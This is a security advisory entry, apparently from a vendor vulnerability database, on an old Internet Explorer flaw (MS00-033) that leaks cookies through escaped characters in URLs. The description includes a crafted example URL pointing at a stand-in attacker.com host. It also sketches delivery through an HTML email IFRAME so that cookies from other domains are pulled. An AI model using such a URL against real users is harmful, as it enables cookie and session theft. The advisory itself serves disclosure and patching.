Title: Microsoft IE Cookie Disclosure Vulnerability
Severity: MODERATE
Description:
IE determines whether or not to provide cookie information by comparing the domain of the host requesting the cookie to the domain of the host that provided the cookie. In URLs, this procedure ignores escaped characters, so that the URL http: //www.attacker.com/gimmie_your_cookies.html?target.com will be properly determined to be originating from attacker.com, while the URL http: //www.attacker.com%2fgimmie_your_cookies.html%3f.attacker.com will be misinterpreted as originating from target.com, and all target.com cookies on the victim's system will be freely issued to attacker.com.
Referring IE to such a URL makes it possible for a malicious web site to view a users cookies from the target domain. It is also possible to exploit this by sending HTML email to the target, using the hostile URL as the src value of an IFRAME. Such an email could easily include several different URLs, each pulling cookies from a seperate domain.
Affected Products:
- Microsoft Internet Explorer 3.0.0 for Windows 95
- Microsoft Internet Explorer 3.0.0 for Windows NT 4.0
- Microsoft Internet Explorer 3.2.0 for Windows 95
- Microsoft Internet Explorer 3.2.0 for Windows NT 4.0
- Microsoft Internet Explorer 4.0.0
- Microsoft Internet Explorer 4.0.0 for Windows 95
- Microsoft Internet Explorer 4.0.0 for Windows NT 4.0
- Microsoft Internet Explorer 4.0.1
- Microsoft Internet Explorer 4.0.1 for Windows 98
- Microsoft Internet Explorer 4.0.1 for Windows NT 4.0
- Microsoft Internet Explorer 4.1.0 for Windows 95
- Microsoft Internet Explorer 4.1.0 for Windows 98
- Microsoft Internet Explorer 4.1.0 for Windows NT 4.0
- Microsoft Internet Explorer 5.0 for Windows 95
- Microsoft Internet Explorer 5.0 for Windows 98
- Microsoft Internet Explorer 5.0 for Windows NT 4.0
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
References:
- Bennett Haselton: Internet Explorer "Open Cookie Jar"
- Kevin Featherly: Hacker: Explorer Flaw Exposes Private "Cookie"
- Microsoft: Frequently Asked Questions: Microsoft Security Bulletin (MS00-033)
- Microsoft: Q262509: Patch Available for "Frame Domain Verification," "Unauthorized Cookie A
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.